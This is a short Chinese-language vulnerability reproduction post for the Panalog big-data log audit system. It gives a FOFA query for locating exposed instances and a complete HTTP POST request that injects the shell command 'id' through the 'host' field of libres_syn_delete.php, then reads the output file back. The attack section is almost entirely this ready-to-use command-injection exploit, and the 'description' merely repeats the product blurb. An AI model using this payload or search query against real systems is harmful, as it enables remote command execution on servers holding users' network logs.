文章目录
- 前言
- 声明
- 一、Panalog大数据日志审计系统简介
- 二、漏洞描述
- 三、影响版本
- 四、漏洞复现
- 五、整改意见
前言
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。
声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、Panalog大数据日志审计系统简介
panalog为一款流量分析,日志分析管理的一款软件。
二、漏洞描述
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。
三、影响版本
Panalog大数据日志审计系统
四、漏洞复现
FOFA:app="Panabit-Panalog"
漏洞链接:https://127.0.0.1/content-apply/libres_syn_delete.php
漏洞数据包:
POST /content-apply/libres_syn_delete.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
token=1&id=2&host=|id >990996.txt
访问生成的文件路径: https://127.0.0.1/content-apply/990996.txt
五、整改意见
目前厂商尚未提供相关漏洞补丁链接,请关注厂商主页及时更新:https://www.panabit.com/